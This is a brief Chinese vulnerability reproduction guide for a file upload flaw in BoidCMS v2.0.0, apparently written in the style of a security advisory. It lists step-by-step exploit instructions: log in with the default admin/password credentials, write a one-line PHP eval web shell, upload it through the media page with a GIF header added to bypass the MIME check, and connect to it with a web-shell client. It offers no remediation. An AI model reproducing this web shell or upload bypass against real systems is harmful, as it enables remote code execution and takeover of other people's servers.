一、漏洞概述
BoidCMS v.2.0.0 存在文件上传漏洞,远程攻击者可通过添加 GIF 头部绕过 MIME 类型检查,执行任意代码。
二、影响范围
BoidCMS v.2.0.0
三、访问页面
四、漏洞复现
1、后台地址/admin
2、使用账号密码admin/password登录后台
3、找到文件上传点media
4、制作cmd.php文件
<?php @eval($_POST['cmd']);?>
5、上传cmd.php文件,抓包添加GIF头部绕过 MIME 类型检查。
6、访问cmd.php上传地址/media/cmd.php成功。
7、使用蚁剑等工具连接